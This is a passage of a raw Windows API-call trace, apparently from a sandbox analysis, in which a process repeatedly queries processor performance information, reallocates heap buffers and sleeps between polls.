[0266.747] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.748] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0266.748] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0266.748] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.749] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0266.749] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0266.749] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.749] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0266.749] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0266.749] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0266.750] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0266.750] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0266.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0266.751] Sleep (dwMilliseconds=0x110) [0266.851] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0266.852] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.852] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0266.852] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0266.852] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.853] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0266.857] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0266.857] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.858] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0266.858] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0266.858] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0266.859] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0266.859] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0266.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0266.860] Sleep (dwMilliseconds=0x110) [0267.023] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0267.023] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0267.024] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0267.024] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0267.024] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0267.024] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0267.029] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0267.029] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0267.029] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0267.029] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0267.029] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0267.030] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0267.030] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0267.030] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0267.030] Sleep (dwMilliseconds=0x110) [0267.070] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0267.070] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0267.071] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0267.071] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0267.071] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0267.077] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0267.077] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0267.077] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0267.078] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0267.078] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0267.078] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0267.079] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0267.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0267.079] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0267.079] Sleep (dwMilliseconds=0x110) [0267.091] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0267.091] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0267.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0267.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0267.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0267.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0267.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0267.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0267.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0267.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0267.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0267.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0267.098] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0267.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0267.098] Sleep (dwMilliseconds=0x110) [0267.659] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0267.659] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0267.661] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0267.661] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0267.662] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0267.662] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0267.662] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0267.662] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0267.663] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0267.663] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0267.663] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0267.663] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0267.663] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0267.663] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0267.664] Sleep (dwMilliseconds=0x110) [0267.921] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0267.921] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0267.922] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0267.922] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0267.922] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0267.923] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0267.923] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0267.923] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0267.923] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0267.923] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0267.923] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0267.923] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0267.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0267.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0267.926] Sleep (dwMilliseconds=0x110) [0268.197] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0268.197] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0268.198] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0268.198] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0268.198] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0268.199] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0268.199] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0268.199] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0268.199] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0268.199] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0268.199] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0268.200] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0268.202] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0268.202] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0268.202] Sleep (dwMilliseconds=0x110) [0268.243] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0268.243] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0268.244] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0268.244] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0268.244] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0268.245] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0268.245] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c0f0 [0268.245] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c0f0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c0f0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0268.245] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c0f0 | out: hHeap=0x2560000) returned 1 [0268.245] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0268.245] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0268.246] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0268.246] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0268.246] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0268.247] Sleep (dwMilliseconds=0x110) [0269.088] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0269.089] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.089] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0269.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0269.095] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0269.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0269.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0269.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0269.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0269.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0269.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0269.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0269.098] Sleep (dwMilliseconds=0x110) [0269.161] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0269.161] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.162] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0269.165] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0269.165] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.166] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0269.166] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0269.166] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.166] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0269.166] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0269.166] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0269.167] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0269.167] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0269.167] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0269.167] Sleep (dwMilliseconds=0x110) [0269.276] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0269.276] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.276] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0269.276] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0269.276] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.277] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0269.280] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0269.280] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.281] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0269.281] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0269.281] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0269.281] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0269.281] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0269.282] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0269.282] Sleep (dwMilliseconds=0x110) [0269.321] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0269.321] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.322] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0269.326] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0269.326] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.327] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0269.327] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0269.327] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.328] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0269.328] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0269.328] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0269.328] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0269.328] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0269.329] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0269.329] Sleep (dwMilliseconds=0x110) [0269.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0269.363] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.364] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0269.364] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0269.364] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.364] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0269.364] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0269.364] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0269.365] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0269.365] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0269.365] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0269.365] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0269.365] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0269.366] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0269.366] 